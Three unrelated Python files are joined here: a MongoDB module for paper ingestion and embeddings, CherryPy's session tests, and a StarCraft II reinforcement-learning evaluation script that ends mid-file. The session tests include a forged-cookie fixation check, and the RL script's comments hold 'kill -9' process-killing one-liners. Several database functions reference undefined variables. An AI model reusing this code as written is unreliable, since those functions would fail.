def update_clean_documents(clean_documents):
"""
clean_document: dict
- hash_id
- sections
- citations
"""
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
for doc in clean_documents:
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {'clean': doc}}, upsert=True)
@staticmethod
def fix_compute_mean_vector(use, func, doc):
return func(doc[use])
@staticmethod
def update_mean_vectors(method, use='raw', force=False):
assert('.' not in method and '$' not in method)
method_obj = Database.get_method(method)
if not force:
query_dict = {f'sections_embeddings.{method}': {'$exists': True}}
else:
query_dict = {}
documents = Database.list_documents(query=query_dict, projection={use: 1, 'hash_id': 1, '_id': 0, f'sections_embeddings.{method}': 1})
num_workers = Params.COMPUTE_VECTORS_WORKERS if not hasattr(method_obj, 'NUM_WORKERS') else method_obj.NUM_WORKERS
use_loop = False
if hasattr(method_obj, 'TYPE_THREADING'):
if method_obj.TYPE_THREADING == 'pytorch':
import torch.multiprocessing as mp
try:
mp.set_start_method('spawn', True)
except:
pass
create_exec = lambda: mp.Pool(num_workers)
elif method_obj.TYPE_THREADING == 'python':
from multiprocessing import Pool
create_exec = lambda: Pool(num_workers)
elif method_obj.TYPE_THREADING == None:
use_loop = True
else:
create_exec = lambda: cf.ThreadPoolExecutor(max_workers=num_workers)
else:
create_exec = lambda: cf.ThreadPoolExecutor(max_workers=num_workers)
if use_loop:
for doc in tqdm(documents):
sections_vector = method_obj.compute_mean_vector(doc[use])
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
if force or method not in doc['sections_embeddings'].keys():
for k in sections_vector.keys():
if sections_vector[k] is not None:
sections_vector[k]['vector'] = Binary(pickle.dumps(sections_vector[k]['vector'], protocol=2))
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {f'sections_embeddings.{method}': sections_vector}}, upsert=True)
else:
with create_exec() as executor:
for doc, sections_vector in zip(documents, tqdm(executor.map(partial(Database.fix_compute_mean_vector, use, method_obj.compute_mean_vector), documents), total=len(documents))):
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
if force or method not in doc['sections_embeddings'].keys():
for k in sections_vector.keys():
if sections_vector[k] is not None:
sections_vector[k]['vector'] = Binary(pickle.dumps(sections_vector[k]['vector'], protocol=2))
Connection.DB.documents.update_one({'hash_id': doc['hash_id']}, {'$set': {f'sections_embeddings.{method}': sections_vector}}, upsert=True)
"""
==============================================================================
GET
==============================================================================
"""
def list_documents(query={}, hash_ids=None, projection={}, use_translation=False):
query_dict = {}
if hash_ids is not None:
query_dict['hash_id'] = {'$in': hash_ids}
query_dict.update(query)
if use_translation:
projection.update({'sections_translation': 1})
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
documents = []
for doc in Connection.DB.documents.find(query_dict, projection):
if use_translation:
for type_data in ['raw', 'clean']:
if type_data in projection.keys() and bool(projection[type_data]):
aux_sections = doc[type_data]['sections']
doc[type_data]['sections'] = {}
for k in aux_sections:
fix_section = doc['sections_translation'][k]
doc[type_data]['sections'][fix_section] = aux_sections[k]
documents.append(doc)
return documents
return []
def list_raw_documents(hash_ids=None, use_translation=False):
return Database.list_documents(hash_ids=hash_ids, projection={'raw': 1, 'hash_id': 1, '_id': 0, 'title': 1, 'url': 1}, use_translation=use_translation)
def list_clean_documents(hash_ids=None, use_translation=False):
return Database.list_documents(hash_ids=hash_ids, projection={'clean': 1, 'hash_id': 1, '_id': 0, 'title': 1, 'url': 1}, use_translation=use_translation)
def list_titles(hash_ids=None):
return Database.list_documents(hash_ids=hash_ids, projection={'title': 1, 'hash_id': 1, '_id': 0}, use_translation=use_translation)
def read_mean_embedding(method_obj, doc):
if 'sections_embeddings' not in doc:
mean_vector = None
else:
for k in doc['sections_embeddings'].keys():
if doc['sections_embeddings'][k] is not None:
doc['sections_embeddings'][k]['vector'] = pickle.loads(doc['sections_embeddings'][k]['vector'])
mean_vector = method_obj.get_mean_vector(doc['sections_embeddings'])
return {
'vector': mean_vector,
'hash_id': doc['hash_id']
}
def list_doc_embeddings(method, hash_ids=None, cache=True):
assert('.' not in method and '$' not in method)
method_obj = Database.get_method(method)
query_dict = {}
if hash_ids is not None:
query_dict['hash_id'] = {'$in': hash_ids}
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
output_vectors = []
with cf.ThreadPoolExecutor(max_workers=Params.READ_EMBEDDINGS_WORKERS) as executor:
list_docs = Connection.DB.documents.aggregate([
{'$project': {'sections_translation': 1, 'sections_embeddings': f'$sections_embeddings.{method}', 'hash_id': 1, '_id': 0}}
])
for vec in executor.map(partial(Database.read_mean_embedding, method_obj), list_docs):
output_vectors.append(vec)
return output_vectors
return []
def read_mean_embedding_from_section(method_obj, use_translation, doc):
if use_translation:
translation_lut = doc['sections_translation']
else:
translation_lut = None
for k in doc['sections_embeddings'].keys():
if doc['sections_embeddings'][k] is not None:
doc['sections_embeddings'][k]['vector'] = pickle.loads(doc['sections_embeddings'][k]['vector'])
mean_vector = method_obj.get_mean_vector_from_section(doc['sections_embeddings'], section, translation_lut)
output_vectors.append({
'vector': mean_vector,
'hash_id': doc['hash_id']
})
def list_doc_embeddings_from_section(method, section, hash_ids=None, use_translation=False):
assert('.' not in method and '$' not in method)
method_obj = Database.get_method(method)
query_dict = {}
if hash_ids is not None:
query_dict['hash_id'] = {'$in': hash_ids}
with Connection.CLIENT.start_session() as session:
with session.start_transaction():
output_vectors = []
with cf.ThreadPoolExecutor(max_workers=Params.READ_EMBEDDINGS_WORKERS) as executor:
list_docs = Connection.DB.documents.aggregate([
{'$project': {'sections_translation': 1, 'sections_embeddings': f'$sections_embeddings.{method}', 'hash_id': 1, '_id': 0}}
])
for vec in executor.map(partial(Database.read_mean_embedding_from_section, method_obj, use_translation), list_docs):
output_vectors.append(vec)
return output_vectors
return []
"""
==============================================================================
==============================================================================
DATA INGESTION AND PROCESSING
==============================================================================
==============================================================================
"""
"""
==============================================================================
SCAN AND SAVE
==============================================================================
"""
@staticmethod
def parse_document_json(json_path):
data = {}
with open(json_path) as json_file:
try:
json_data = json.load(json_file)
except:
return None
if Database.exists(json_data['paper_id']):
return None
data['hash_id'] = json_data['paper_id']
data['title'] = json_data['metadata']['title']
data['authors'] = json_data['metadata']['authors']
data['bib_entries'] = json_data['bib_entries']
data['ref_entries'] = json_data['ref_entries']
data['citations'] = defaultdict(list)
data['sections'] = defaultdict(lambda: "")
# Abstract
if isinstance(json_data['abstract'], (list, tuple)):
try:
data['sections']['abstract'] = json_data['abstract'][0]['text']
data['citations']['abstract'] += [{'start': cite['start'], 'end': cite['end'], 'ref_id': cite['ref_id']} for cite in json_data['abstract'][0]['cite_spans']]
except:
data['sections']['abstract'] = ''
else:
data['sections']['abstract'] = json_data['abstract']
offsets = defaultdict(lambda: 0)
sections_order = OrderedDict()
for block_text in json_data['body_text']:
text = block_text['text']
section = block_text['section'].replace('.', "").replace("$", "")
data['sections'][section] += text
data['citations'][section] += [{'start': offsets[section] + cite['start'], 'end': offsets[section] + cite['end'], 'ref_id': cite['ref_id']} for cite in block_text['cite_spans']]
offsets[section] += len(text)
if section not in sections_order:
sections_order[section] = True
data['sections_order'] = list(sections_order.keys())
return data
@staticmethod
def scan_file(json_path):
return Database.parse_document_json(json_path)
@staticmethod
def scan_folder(folder_path):
documents = []
for folder_path in filter(lambda folder_path: os.path.isdir(folder_path), glob2.iglob(os.path.join(folder_path, "*"))):
folder_name = os.path.basename(folder_path)
print('\tProcessing %s folder' % (folder_name, ))
with cf.ThreadPoolExecutor(max_workers=Params.SCAN_WORKERS) as executor:
list_jsons = glob2.glob(os.path.join(folder_path, "**", "*.json"))
for raw_doc in tqdm(executor.map(Database.scan_file, list_jsons), total=len(list_jsons)):
if raw_doc is not None:
Database.insert_raw_document(raw_doc)
documents.append(raw_doc)
# Return
return documents
"""
==============================================================================
SYNC
==============================================================================
"""
@staticmethod
def sync(callback_preprocessing=None):
# Lazy loading to avoid asking for credentials when not syncing
import kaggle
is_processing = False
def __sync_thread():
nonlocal is_processing
if is_processing:
return
is_processing = True
print('Checking new changes...')
# Download from kaggle
kaggle.api.authenticate()
kaggle.api.dataset_download_files(Params.DATASET_KAGGLE_NAME, path=Params.DATASET_KAGGLE_RAW, unzip=True)
# Create new dataset with the changes
raw_documents = Database.scan_folder(Params.DATASET_KAGGLE_RAW)
# Execute callback
if callback_preprocessing is not None:
callback_preprocessing(raw_documents)
# Is done
is_processing = False
t = Thread(target=__sync_thread)
t.start()
schedule.every().hour.do(__sync_thread)
while True:
schedule.run_pending()
time.sleep(3600)
|
test_session.py
|
import os
import threading
import time
import socket
from http.client import HTTPConnection
import pytest
from path import Path
from more_itertools import consume
import cherrypy
from cherrypy._cpcompat import HTTPSConnection
from cherrypy.lib import sessions
from cherrypy.lib import reprconf
from cherrypy.lib.httputil import response_codes
from cherrypy.test import helper
from cherrypy import _json as json
localDir = Path(__file__).dirname()
def http_methods_allowed(methods=['GET', 'HEAD']):
method = cherrypy.request.method.upper()
if method not in methods:
cherrypy.response.headers['Allow'] = ', '.join(methods)
raise cherrypy.HTTPError(405)
cherrypy.tools.allow = cherrypy.Tool('on_start_resource', http_methods_allowed)
def setup_server():
@cherrypy.config(**{
'tools.sessions.on': True,
'tools.sessions.storage_class': sessions.RamSession,
'tools.sessions.storage_path': localDir,
'tools.sessions.timeout': (1.0 / 60),
'tools.sessions.clean_freq': (1.0 / 60),
})
class Root:
@cherrypy.expose
def clear(self):
cherrypy.session.cache.clear()
@cherrypy.expose
def data(self):
cherrypy.session['aha'] = 'foo'
return repr(cherrypy.session._data)
@cherrypy.expose
def testGen(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
yield str(counter)
@cherrypy.expose
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
@cherrypy.expose
@cherrypy.config(**{'tools.sessions.on': False})
def set_session_cls(self, new_cls_name):
new_cls = reprconf.attributes(new_cls_name)
cfg = {'tools.sessions.storage_class': new_cls}
self.__class__._cp_config.update(cfg)
if hasattr(cherrypy, 'session'):
del cherrypy.session
if new_cls.clean_thread:
new_cls.clean_thread.stop()
new_cls.clean_thread.unsubscribe()
del new_cls.clean_thread
@cherrypy.expose
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
@cherrypy.expose
def keyin(self, key):
return str(key in cherrypy.session)
@cherrypy.expose
def delete(self):
cherrypy.session.delete()
sessions.expire()
return 'done'
@cherrypy.expose
def delkey(self, key):
del cherrypy.session[key]
return 'OK'
@cherrypy.expose
def redir_target(self):
return self._cp_config['tools.sessions.storage_class'].__name__
@cherrypy.expose
def iredir(self):
raise cherrypy.InternalRedirect('/redir_target')
@cherrypy.expose
@cherrypy.config(**{
'tools.allow.on': True,
'tools.allow.methods': ['GET'],
})
def restricted(self):
return cherrypy.request.method
@cherrypy.expose
def regen(self):
cherrypy.tools.sessions.regenerate()
return 'logged in'
@cherrypy.expose
def length(self):
return str(len(cherrypy.session))
@cherrypy.expose
@cherrypy.config(**{
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False,
})
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
cherrypy.tree.mount(Root())
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
@classmethod
def teardown_class(cls):
"""Clean up sessions."""
super(cls, cls).teardown_class()
consume(
file.remove_p()
for file in localDir.listdir()
if file.basename().startswith(
sessions.FileSession.SESSION_PREFIX
)
)
@pytest.mark.xfail(reason='#1534')
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertDictEqual(json.decode(self.body),
{'counter': 3, 'aha': 'foo'})
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody('done')
self.getPage('/delete', cookieset1)
self.assertBody('done')
def f():
return [
x
for x in os.listdir(localDir)
if x.startswith('session-')
]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self._test_Concurrency()
@pytest.mark.xfail(reason='#1306')
def test_2_File_Concurrency(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.FileSession')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
# sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('FileSession')
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
path = os.path.join(localDir, 'session-' + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.getPage('/testStr',
headers=[
('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(';', 1)[0].split('=', 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/set_session_cls/cherrypy.lib.sessions.RamSession')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(list(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(list(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(';')])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()),
set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = list(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail('The second session did not time out.')
else:
self.fail('Unknown session id in cache: %r', cache)
def test_8_Ram_Cleanup(self):
def lock():
s1 = sessions.RamSession()
s1.acquire_lock()
time.sleep(1)
s1.release_lock()
t = threading.Thread(target=lock)
t.start()
start = time.time()
while not sessions.RamSession.locks and time.time() - start < 5:
time.sleep(0.01)
assert len(sessions.RamSession.locks) == 1, 'Lock not acquired'
s2 = sessions.RamSession()
s2.clean_up()
msg = 'Clean up should not remove active lock'
assert len(sessions.RamSession.locks) == 1, msg
t.join()
def is_memcached_available():
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
return True
except socket.error:
if s:
s.close()
return False
@pytest.mark.skipif(
not is_memcached_available(),
reason='memcached not reachable',
)
@pytest.mark.importorskip('memcache')
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage(
'/set_session_cls/cherrypy.lib.sessions.MemcachedSession'
)
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody('NotImplementedError')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody('done')
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage('/', cookies)
# Uncomment the following line to prove threads overlap.
# sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('MemcachedSession')
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(
404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
eval_mini_srcgame.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "0,1,2,3"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent as mini_source_agent
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from mini_network import MiniNetwork
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_bool("debug_mode", True, "Whether is debuging")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
flags.DEFINE_string("restore_model_path", "./model/20200806-151958_source/", "path for restore model")
flags.DEFINE_bool("restore_model", True, "Whether to restore old model")
flags.DEFINE_integer("parallel", 10, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 4170, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 50, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server or FLAGS.debug_mode:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 2
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
DEVICE = ['/gpu:' + dev for dev in FLAGS.device.split(',')]
#DEVICE = ['/cpu:0']
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variable
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
# nohup python eval_mini_srcgame.py > no_action_set_add.out &
# nohup python eval_mini_srcgame.py > action_set_add.out &
# ps -ef |grep liuruoze | grep 'SC2_x64' | awk '{print $2}' | xargs kill -9
# nohup python main.py > result.out &
# kill -9 `ps -ef |grep liuruoze | grep python3 | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep eval_mini_srcgame_worldmodel | awk '{print $2}' `
# kill -9 `ps -ef |grep lrz | grep main.py | awk '{print $2}' `
# ps -ef |grep pangzhj | grep 'main.py'
# ps -ef | grep liuruoze | grep -v sshd
# export -n http_proxy
# export -n https_proxy
# kill -9 `ps -ef |grep liuruoze | awk '{print $2}' `
# kill -9 `ps -ef |grep liuruoze | grep test_prototype.py | awk '{print $2}' `
# kill -9 `ps -ef |grep lrz | grep main.py | awk '{print $2}' `
# fuser -v /dev/nvidia*
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
C._FPS = 22.4 / FLAGS.step_mul # 5.6
step_mul = FLAGS.step_mul # 4
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play(verbose=FLAGS.debug_mode)
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
Net = MiniNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
game_num = np.ceil(update_game_num // THREAD_NUM)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO count the time , compare cpu and gpu
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
return max_win_rate
def _main(unused_argv):
# create distribute tf cluster
